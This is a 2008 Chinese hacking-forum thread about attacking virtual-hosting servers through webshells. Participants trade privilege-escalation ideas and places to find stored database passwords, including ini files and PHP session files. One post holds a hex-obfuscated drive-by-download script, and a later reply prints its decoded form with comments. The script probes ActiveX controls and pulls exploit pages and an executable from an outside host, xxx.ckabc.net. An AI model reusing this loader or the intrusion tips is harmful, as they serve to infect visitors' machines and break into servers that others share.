标题:
[讨论]WEB虚拟系统搞不定 来论坛讨论一下
作者:
richy
时间:
2008-7-22 09:43
标题:
[讨论]WEB虚拟系统搞不定 来论坛讨论一下
[讨论]WEB虚拟系统搞不定 来论坛讨论一下
议题作者:basiner
信息来源:邪恶八进制
不说废话了。
网站是ACCESS数据库,海洋顶端木马,系统Windows 2003,可以执行命令,权限guest,标准虚拟主机权限分配,ASPX不能执行。本机开了MSSQL,折腾半天找不到用户和密码。但是在硬盘的零散文件中找到内网一台机器的MSSQL用户和密码,DB_OWNER权限。
貌似这台机器用的潮流虚拟服务器软件,smartweb 6.6。不知道各位大侠对这个软件熟悉否。
附件中有FTP,和MAIL程序。
未命名.JPG
(36 KB)
2008-1-28 16:20
附件
service.rar
(870 KB)
2008-1-28 16:20, 下载次数: 100
kingdog
晶莹剔透§烈日灼然
作者:
神童
时间:
2008-7-22 09:43
我也有一个webshell,是浪潮虚拟主机的,也搞不定。
jurone
晶莹剔透§烈日灼然
作者:
hycmx
时间:
2008-7-22 09:43
借地发个贴,
遇见一个免杀的网马,不会解密
<!-- Installs a global error handler that returns true, which suppresses the browser's script error reporting, so a failure in the script that follows stays invisible to the visitor. The eval() argument after this line is JavaScript source written entirely as \xNN escapes; a decoded listing of it is posted in a later reply of this thread. -->
<script>window.onerror=function(){return true;}</script>
<script>
eval("\x69\x66\x28\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x63\x6f\x6f\x6b\x69\x65\x2e\x69\x6e\x64\x65\x78\x4f\x66\x28\x27\x4f\x4b\x27\x29\x3d\x3d\x2d\x31\x29\x7b\x0d\x0a\x74\x72\x79\x7b\x76\x61\x72\x20\x65\x65\x65\x65\x65\x65\x65\x65\x3b\x0d\x0a\x76\x61\x72\x20\x61\x64\x6f\x3d\x28\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74\x28\x22\x5c\x78\x36\x66\x5c\x78\x36\x32\x5c\x78\x36\x61\x5c\x78\x36\x35\x5c\x78\x36\x33\x5c\x78\x37\x34\x22\x29\x29\x3b\x0d\x0a\x76\x61\x72\x20\x52\x69\x73\x69\x6e\x67\x3d\x22\x5c\x78\x36\x33\x5c\x78\x36\x63\x5c\x78\x36\x31\x5c\x78\x37\x33\x5c\x78\x37\x33\x5c\x78\x36\x39\x5c\x78\x36\x34\x22\x3b\x0d\x0a\x76\x61\x72\x20\x4b\x56\x32\x30\x30\x38\x3d\x22\x5c\x78\x34\x31\x5c\x78\x36\x34\x5c\x78\x36\x66\x5c\x78\x36\x34\x5c\x78\x36\x32\x5c\x78\x32\x65\x5c\x78\x35\x33\x5c\x78\x37\x34\x5c\x78\x37\x32\x5c\x78\x36\x35\x5c\x78\x36\x31\x5c\x78\x36\x64\x22\x3b\x0d\x0a\x76\x61\x72\x20\x4b\x61\x73\x70\x65\x72\x73\x6b\x79\x3d\x22\x5c\x78\x36\x33\x5c\x78\x36\x63\x5c\x78\x37\x33\x5c\x78\x36\x39\x5c\x78\x36\x34\x5c\x78\x33\x61\x5c\x78\x34\x32\x5c\x78\x34\x34\x5c\x78\x33\x39\x5c\x78\x33\x36\x5c\x78\x34\x33\x5c\x78\x33\x35\x5c\x78\x33\x35\x5c\x78\x33\x36\x5c\x78\x32\x64\x5c\x78\x33\x36\x5c\x78\x33\x35\x5c\x78\x34\x31\x5c\x78\x33\x33\x5c\x78\x32\x64\x5c\x78\x33\x31\x5c\x78\x33\x31\x5c\x78\x34\x34\x5c\x78\x33\x30\x5c\x78\x32\x64\x5c\x78\x33\x39\x5c\x78\x33\x38\x5c\x78\x33\x33\x5c\x78\x34\x31\x5c\x78\x32\x64\x5c\x78\x33\x30\x5c\x78\x33\x30\x5c\x78\x34\x33\x5c\x78\x33\x30\x5c\x78\x33\x34\x5c\x78\x34\x36\x5c\x78\x34\x33\x5c\x78\x33\x32\x5c\x78\x33\x39\x5c\x78\x34\x35\x5c\x78\x33\x33\x5c\x78\x33\x36\x22\x3b\x0d\x0a\x61\x64\x6f\x2e\x73\x65\x74\x41\x74\x74\x72\x69\x62\x75\x74\x65\x28\x52\x69\x73\x69\x6e\x67\x2c\x4b\x61\x73\x70\x65\x72\x73\x6b\x79\x29\x3b\x0d\x0a\x76\x61\x72\x20\x61\x73\x3d\x61\x64\x6f\x2e\x63\x72\x65\x61\x74\x65\x6f\x62\x6a\x65\x63\x74\x28\x4b\x56\x32\x30\x30\x38\x2c\x22\x22\x29\x7d\x0d\x0a\x63\x61\x74\x63\x68\x28\x65\x
65\x65\x65\x65\x65\x65\x65\x29\x7b\x7d\x3b\x0d\x0a\x66\x69\x6e\x61\x6c\x6c\x79\x7b\x0d\x0a\x76\x61\x72\x20\x65\x78\x70\x69\x72\x65\x73\x3d\x6e\x65\x77\x20\x44\x61\x74\x65\x28\x29\x3b\x0d\x0a\x65\x78\x70\x69\x72\x65\x73\x2e\x73\x65\x74\x54\x69\x6d\x65\x28\x65\x78\x70\x69\x72\x65\x73\x2e\x67\x65\x74\x54\x69\x6d\x65\x28\x29\x2b\x33\x2a\x36\x30\x2a\x36\x30\x2a\x31\x30\x30\x30\x29\x3b\x0d\x0a\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x63\x6f\x6f\x6b\x69\x65\x3d\x27\x4f\x4b\x3d\x59\x65\x73\x3b\x70\x61\x74\x68\x3d\x2f\x3b\x65\x78\x70\x69\x72\x65\x73\x3d\x27\x2b\x65\x78\x70\x69\x72\x65\x73\x2e\x74\x6f\x47\x4d\x54\x53\x74\x72\x69\x6e\x67\x28\x29\x3b\x0d\x0a\x69\x66\x28\x65\x65\x65\x65\x65\x65\x65\x65\x21\x3d\x22\x5b\x6f\x62\x6a\x65\x63\x74\x20\x45\x72\x72\x6f\x72\x5d\x22\x29\x7b\x0d\x0a\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x28\x22\x3c\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3d\x68\x74\x74\x70\x3a\x5c\x2f\x5c\x2f\x78\x78\x78\x2e\x63\x6b\x61\x62\x63\x2e\x6e\x65\x74\x5c\x2f\x6d\x73\x30\x36\x30\x31\x34\x2e\x6a\x73\x3e\x3c\x5c\x2f\x73\x63\x72\x69\x70\x74\x3e\x22\x29\x7d\x0d\x0a\x65\x6c\x73\x65\x7b\x0d\x0a\x74\x72\x79\x7b\x76\x61\x72\x20\x66\x66\x66\x66\x66\x66\x66\x66\x3b\x0d\x0a\x76\x61\x72\x20\x6f\x75\x72\x67\x61\x6d\x65\x3d\x6e\x65\x77\x20\x41\x63\x74\x69\x76\x65\x58\x4f\x62\x6a\x65\x63\x74\x28\x22\x5c\x78\x34\x37\x5c\x78\x34\x63\x5c\x78\x34\x33\x5c\x78\x34\x38\x5c\x78\x34\x31\x5c\x78\x35\x34\x5c\x78\x32\x65\x5c\x78\x34\x37\x5c\x78\x34\x63\x5c\x78\x34\x33\x5c\x78\x36\x38\x5c\x78\x36\x31\x5c\x78\x37\x34\x5c\x78\x34\x33\x5c\x78\x37\x34\x5c\x78\x37\x32\x5c\x78\x36\x63\x5c\x78\x32\x65\x5c\x78\x33\x31\x22\x29\x3b\x7d\x0d\x0a\x63\x61\x74\x63\x68\x28\x66\x66\x66\x66\x66\x66\x66\x66\x29\x7b\x7d\x3b\x0d\x0a\x66\x69\x6e\x61\x6c\x6c\x79\x7b\x69\x66\x28\x66\x66\x66\x66\x66\x66\x66\x66\x21\x3d\x22\x5b\x6f\x62\x6a\x65\x63\x74\x20\x45\x72\x72\x6f\x72\x5d\x22\x29\x7b\x0d\x0a\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x28\x27\x3c\x69\x66\x72\x61\x6d\x65\x20\x73\x74\x
79\x6c\x65\x3d\x64\x69\x73\x70\x6c\x61\x79\x3a\x6e\x6f\x6e\x65\x20\x73\x72\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x78\x78\x78\x2e\x63\x6b\x61\x62\x63\x2e\x6e\x65\x74\x2f\x47\x4c\x57\x4f\x52\x4c\x44\x2e\x68\x74\x6d\x6c\x22\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e\x27\x29\x7d\x7d\x0d\x0a\x74\x72\x79\x7b\x76\x61\x72\x20\x67\x67\x67\x67\x67\x67\x67\x67\x3b\x0d\x0a\x76\x61\x72\x20\x73\x74\x6f\x72\x6d\x3d\x6e\x65\x77\x20\x41\x63\x74\x69\x76\x65\x58\x4f\x62\x6a\x65\x63\x74\x28\x22\x5c\x78\x34\x64\x5c\x78\x35\x30\x5c\x78\x35\x33\x5c\x78\x32\x65\x5c\x78\x35\x33\x5c\x78\x37\x34\x5c\x78\x36\x66\x5c\x78\x37\x32\x5c\x78\x36\x64\x5c\x78\x35\x30\x5c\x78\x36\x63\x5c\x78\x36\x31\x5c\x78\x37\x39\x5c\x78\x36\x35\x5c\x78\x37\x32\x22\x29\x3b\x7d\x0d\x0a\x63\x61\x74\x63\x68\x28\x67\x67\x67\x67\x67\x67\x67\x67\x29\x7b\x7d\x3b\x0d\x0a\x66\x69\x6e\x61\x6c\x6c\x79\x7b\x69\x66\x28\x67\x67\x67\x67\x67\x67\x67\x67\x21\x3d\x22\x5b\x6f\x62\x6a\x65\x63\x74\x20\x45\x72\x72\x6f\x72\x5d\x22\x29\x7b\x0d\x0a\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x28\x27\x3c\x69\x66\x72\x61\x6d\x65\x20\x73\x74\x79\x6c\x65\x3d\x64\x69\x73\x70\x6c\x61\x79\x3a\x6e\x6f\x6e\x65\x20\x73\x72\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x78\x78\x78\x2e\x63\x6b\x61\x62\x63\x2e\x6e\x65\x74\x2f\x53\x74\x6f\x72\x6d\x49\x49\x2e\x68\x74\x6d\x6c\x22\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e\x27\x29\x7d\x7d\x0d\x0a\x74\x72\x79\x7b\x76\x61\x72\x20\x68\x68\x68\x68\x68\x68\x68\x68\x3b\x0d\x0a\x76\x61\x72\x20\x52\x65\x61\x6c\x3d\x6e\x65\x77\x20\x41\x63\x74\x69\x76\x65\x58\x4f\x62\x6a\x65\x63\x74\x28\x22\x5c\x78\x34\x39\x5c\x78\x34\x35\x5c\x78\x35\x32\x5c\x78\x35\x30\x5c\x78\x34\x33\x5c\x78\x37\x34\x5c\x78\x36\x63\x5c\x78\x32\x65\x5c\x78\x34\x39\x5c\x78\x34\x35\x5c\x78\x35\x32\x5c\x78\x35\x30\x5c\x78\x34\x33\x5c\x78\x37\x34\x5c\x78\x36\x63\x5c\x78\x32\x65\x5c\x78\x33\x31\x22\x29\x3b\x7d\x0d\x0a\x63\x61\x74\x63\x68\x28\x68\x68\x68\x68\x68\x68\x68\x68\x29\x7b\x7d\x3b\x0d\x0a\x66\x69\x6e\x61\x6c\x6c\x79\x7b\x69\x66\x28\x68\x68\x68\x
68\x68\x68\x68\x68\x21\x3d\x22\x5b\x6f\x62\x6a\x65\x63\x74\x20\x45\x72\x72\x6f\x72\x5d\x22\x29\x7b\x0d\x0a\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x28\x27\x3c\x73\x43\x72\x49\x70\x54\x20\x4c\x41\x6e\x47\x75\x41\x67\x45\x3d\x22\x6a\x41\x76\x41\x73\x43\x72\x49\x70\x54\x22\x20\x73\x72\x63\x3d\x68\x74\x74\x70\x3a\x5c\x2f\x5c\x2f\x78\x78\x78\x2e\x63\x6b\x61\x62\x63\x2e\x6e\x65\x74\x5c\x2f\x72\x65\x61\x6c\x2e\x6a\x73\x3e\x3c\x5c\x2f\x73\x63\x72\x69\x70\x74\x3e\x27\x29\x7d\x7d\x0d\x0a\x74\x72\x79\x7b\x76\x61\x72\x20\x69\x69\x69\x69\x69\x69\x69\x69\x3b\x0d\x0a\x76\x61\x72\x20\x74\x68\x75\x6e\x64\x65\x72\x3d\x6e\x65\x77\x20\x41\x63\x74\x69\x76\x65\x58\x4f\x62\x6a\x65\x63\x74\x28\x22\x5c\x78\x34\x34\x5c\x78\x35\x30\x5c\x78\x34\x33\x5c\x78\x36\x63\x5c\x78\x36\x39\x5c\x78\x36\x35\x5c\x78\x36\x65\x5c\x78\x37\x34\x5c\x78\x32\x65\x5c\x78\x35\x36\x5c\x78\x36\x66\x5c\x78\x36\x34\x22\x29\x3b\x7d\x0d\x0a\x63\x61\x74\x63\x68\x28\x69\x69\x69\x69\x69\x69\x69\x69\x29\x7b\x7d\x3b\x0d\x0a\x66\x69\x6e\x61\x6c\x6c\x79\x7b\x69\x66\x28\x69\x69\x69\x69\x69\x69\x69\x69\x21\x3d\x22\x5b\x6f\x62\x6a\x65\x63\x74\x20\x45\x72\x72\x6f\x72\x5d\x22\x29\x7b\x0d\x0a\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x28\x27\x3c\x69\x66\x72\x61\x6d\x65\x20\x73\x74\x79\x6c\x65\x3d\x64\x69\x73\x70\x6c\x61\x79\x3a\x6e\x6f\x6e\x65\x20\x73\x72\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x78\x78\x78\x2e\x63\x6b\x61\x62\x63\x2e\x6e\x65\x74\x2f\x54\x68\x75\x6e\x64\x65\x72\x2e\x68\x74\x6d\x6c\x22\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e\x27\x29\x7d\x7d\x0d\x0a\x74\x72\x79\x7b\x76\x61\x72\x20\x6b\x6b\x6b\x6b\x6b\x6b\x6b\x6b\x3b\x0d\x0a\x76\x61\x72\x20\x42\x61\x69\x64\x75\x3d\x6e\x65\x77\x20\x41\x63\x74\x69\x76\x65\x58\x4f\x62\x6a\x65\x63\x74\x28\x22\x5c\x78\x34\x32\x5c\x78\x36\x31\x5c\x78\x36\x39\x5c\x78\x36\x34\x5c\x78\x37\x35\x5c\x78\x34\x32\x5c\x78\x36\x31\x5c\x78\x37\x32\x5c\x78\x32\x65\x5c\x78\x35\x34\x5c\x78\x36\x66\x5c\x78\x36\x66\x5c\x78\x36\x63\x22\x29\x3b\x7d\x0d\x0a\x63\x61\x74\x63\x68\x28\x
6b\x6b\x6b\x6b\x6b\x6b\x6b\x6b\x29\x7b\x7d\x3b\x0d\x0a\x66\x69\x6e\x61\x6c\x6c\x79\x7b\x69\x66\x28\x6b\x6b\x6b\x6b\x6b\x6b\x6b\x6b\x21\x3d\x22\x5b\x6f\x62\x6a\x65\x63\x74\x20\x45\x72\x72\x6f\x72\x5d\x22\x29\x7b\x0d\x0a\x42\x61\x69\x64\x75\x5b\x22\x5c\x78\x34\x34\x5c\x78\x36\x63\x5c\x78\x36\x66\x5c\x78\x36\x31\x5c\x78\x36\x34\x5c\x78\x34\x34\x5c\x78\x35\x33\x22\x5d\x28\x22\x68\x74\x74\x70\x3a\x2f\x2f\x78\x78\x78\x2e\x63\x6b\x61\x62\x63\x2e\x6e\x65\x74\x2f\x42\x61\x69\x64\x75\x2e\x63\x61\x62\x22\x2c\x20\x22\x5c\x78\x34\x32\x5c\x78\x36\x31\x5c\x78\x36\x39\x5c\x78\x36\x34\x5c\x78\x37\x35\x5c\x78\x32\x65\x5c\x78\x36\x35\x5c\x78\x37\x38\x5c\x78\x36\x35\x22\x2c\x20\x30\x29\x7d\x7d\x0d\x0a\x69\x66\x28\x66\x66\x66\x66\x66\x66\x66\x66\x3d\x3d\x22\x5b\x6f\x62\x6a\x65\x63\x74\x20\x45\x72\x72\x6f\x72\x5d\x22\x20\x26\x26\x20\x67\x67\x67\x67\x67\x67\x67\x67\x3d\x3d\x22\x5b\x6f\x62\x6a\x65\x63\x74\x20\x45\x72\x72\x6f\x72\x5d\x22\x20\x26\x26\x20\x68\x68\x68\x68\x68\x68\x68\x68\x3d\x3d\x22\x5b\x6f\x62\x6a\x65\x63\x74\x20\x45\x72\x72\x6f\x72\x5d\x22\x20\x26\x26\x20\x69\x69\x69\x69\x69\x69\x69\x69\x3d\x3d\x22\x5b\x6f\x62\x6a\x65\x63\x74\x20\x45\x72\x72\x6f\x72\x5d\x22\x29\x0d\x0a\x7b\x0d\x0a\x6c\x6f\x63\x61\x74\x69\x6f\x6e\x2e\x72\x65\x70\x6c\x61\x63\x65\x28\x22\x61\x62\x6f\x75\x74\x3a\x62\x6c\x61\x6e\x6b\x22\x29\x3b\x7d\x0d\x0a\x7d\x7d\x7d")
</script>
爱要怎么说出口
winger
晶莹剔透§烈日灼然
作者:
紫绫
时间:
2008-7-22 09:43
楼上的这个肯定免杀啊
只是挂马页
<!-- Global error handler that returns true: script errors raised by the code below are not reported to the visitor. -->
<script>window.onerror=function(){return true;}</script>
<script>
/*
 * Decoded form of the hex-escaped eval() payload quoted earlier in this thread:
 * a browser-side loader that fingerprints installed ActiveX controls and pulls
 * a matching second-stage page for each one it finds.
 *
 * NOTE(review): the opening quote after eval( is a typographic quote left by
 * the forum software, and the "catch(...){}; finally{" sequence is not valid
 * standard ECMAScript, so this listing will not parse in a modern engine.
 * Presumably it targets the legacy Internet Explorer script engine - confirm
 * before relying on any emulation result.
 *
 * Flow, as visible in the lines below:
 *  1. Gate: runs only when document.cookie contains no "OK" entry, then sets
 *     OK=Yes (path=/, expiry now + 3*60*60*1000 ms), so the same browser is
 *     served at most once per three hours. The cookie is a usable indicator
 *     on a host that visited an infected page.
 *  2. Creates an <object> element, sets classid to
 *     clsid:BD96C556-65A3-11D0-983A-00C04FC29E36 and calls
 *     createobject("Adodb.Stream",""). If the check on the caught-exception
 *     variable passes, document.write loads ms06014.js from xxx.ckabc.net
 *     (the file name suggests the MS06-014 issue; the "xxx" label looks
 *     redacted by the poster).
 *  3. Otherwise probes ProgIDs with new ActiveXObject(...) and, for each one
 *     that instantiates, writes a hidden iframe or script tag:
 *       GLCHAT.GLChatCtrl.1  -> GLWORLD.html
 *       MPS.StormPlayer      -> StormII.html
 *       IERPCtl.IERPCtl.1    -> real.js
 *       DPClient.Vod         -> Thunder.html
 *       BaiduBar.Tool        -> calls its DloadDS method with Baidu.cab / Baidu.exe
 *  4. If the GLCHAT, StormPlayer, IERPCtl and DPClient probes all failed, the
 *     page navigates to about:blank.
 *
 * Each probe declares a var and reuses the same name as the catch parameter,
 * then compares it with "[object Error]" in finally. NOTE(review): this only
 * distinguishes success from failure if the engine leaks the catch binding
 * into the enclosing scope (legacy JScript behaviour, to be confirmed); in a
 * standards-compliant engine the var stays undefined and every branch fires.
 *
 * The identifiers Rising, KV2008 and Kaspersky are plain variable names that
 * hold "classid", "Adodb.Stream" and the CLSID string; they call nothing in
 * any antivirus product. The remaining \xNN strings are the ProgIDs listed
 * above, which are the stable strings to match on after unescaping.
 */
eval(“if(document.cookie.indexOf('OK')==-1){
try{var eeeeeeee;
var ado=(document.createElement("\x6f\x62\x6a\x65\x63\x74"));
var Rising="\x63\x6c\x61\x73\x73\x69\x64";
var KV2008="\x41\x64\x6f\x64\x62\x2e\x53\x74\x72\x65\x61\x6d";
var Kaspersky="\x63\x6c\x73\x69\x64\x3a\x42\x44\x39\x36\x43\x35\x35\x36\x2d\x36\x35\x41\x33\x2d\x31\x31\x44\x30\x2d\x39\x38\x33\x41\x2d\x30\x30\x43\x30\x34\x46\x43\x32\x39\x45\x33\x36";
ado.setAttribute(Rising,Kaspersky);
var as=ado.createobject(KV2008,"")}
catch(eeeeeeee){};
finally{
var expires=new Date();
expires.setTime(expires.getTime()+3*60*60*1000);
document.cookie='OK=Yes;path=/;expires='+expires.toGMTString();
if(eeeeeeee!="[object Error]"){
document.write("<script src=http:\/\/xxx.ckabc.net\/ms06014.js><\/script>")}
else{
try{var ffffffff;
var ourgame=new ActiveXObject("\x47\x4c\x43\x48\x41\x54\x2e\x47\x4c\x43\x68\x61\x74\x43\x74\x72\x6c\x2e\x31");}
catch(ffffffff){};
finally{if(ffffffff!="[object Error]"){
document.write('<iframe style=display:none src="http://xxx.ckabc.net/GLWORLD.html"></iframe>')}}
try{var gggggggg;
var storm=new ActiveXObject("\x4d\x50\x53\x2e\x53\x74\x6f\x72\x6d\x50\x6c\x61\x79\x65\x72");}
catch(gggggggg){};
finally{if(gggggggg!="[object Error]"){
document.write('<iframe style=display:none src="http://xxx.ckabc.net/StormII.html"></iframe>')}}
try{var hhhhhhhh;
var Real=new ActiveXObject("\x49\x45\x52\x50\x43\x74\x6c\x2e\x49\x45\x52\x50\x43\x74\x6c\x2e\x31");}
catch(hhhhhhhh){};
finally{if(hhhhhhhh!="[object Error]"){
document.write('<sCrIpT LAnGuAgE="jAvAsCrIpT" src=http:\/\/xxx.ckabc.net\/real.js><\/script>')}}
try{var iiiiiiii;
var thunder=new ActiveXObject("\x44\x50\x43\x6c\x69\x65\x6e\x74\x2e\x56\x6f\x64");}
catch(iiiiiiii){};
finally{if(iiiiiiii!="[object Error]"){
document.write('<iframe style=display:none src="http://xxx.ckabc.net/Thunder.html"></iframe>')}}
try{var kkkkkkkk;
var Baidu=new ActiveXObject("\x42\x61\x69\x64\x75\x42\x61\x72\x2e\x54\x6f\x6f\x6c");}
catch(kkkkkkkk){};
finally{if(kkkkkkkk!="[object Error]"){
Baidu["\x44\x6c\x6f\x61\x64\x44\x53"]("http://xxx.ckabc.net/Baidu.cab", "\x42\x61\x69\x64\x75\x2e\x65\x78\x65", 0)}}
if(ffffffff=="[object Error]" && gggggggg=="[object Error]" && hhhhhhhh=="[object Error]" && iiiiiiii=="[object Error]")
{
location.replace("about:blank");}
}}}")
</script>天空之翼 谁曾纷飞
vertusd
晶莹剔透§烈日灼然
作者:
沙包
时间:
2008-7-22 09:43
这几天在弄一个虚拟主机,设置蛮BT的,不能运行程序,传个CMD只能运行很少的命令,硬盘大部分位置也不能浏览,程序的目录也设置得很BT。不过我发现读注册表很有用,主机上主要程序的路径几乎都暴出来了,不过大部分不能写入。最后发现ZEND的目录里面可写,不过PHP上传失败(明明有写入权),而ASP马写入也失败。另一方面,主机有PHPMYADMIN,在C:\windows\temp目录下发现有SESSION临时文件,里面竟然有一些MYSQL用户的明文密码!!不过权限也BT,没有文件权。服务器也有MSSQL,现在只有继续用旁注的方法搞了,大家有什么思路没有?
特别是暴路径,不过每个虚拟路径都是单独用户,无法跳转,不过知道总比不知道的好的说
zhuziliu
晶莹剔透§烈日灼然
作者:
死性不改
时间:
2008-7-22 09:43
楼主可以看下system32下面有没有Z_Tide.ini这个文件,里面应该有些内容。
system32下面应该还有一个MsSqlDbConf.ini文件,里面的用户是SA权限。
hushui
晶莹剔透§烈日灼然
作者:
6G150
时间:
2008-7-22 09:43
地板上的同学
有了mysql密码,楼主可以试下在cmd下运行php程序,然后提权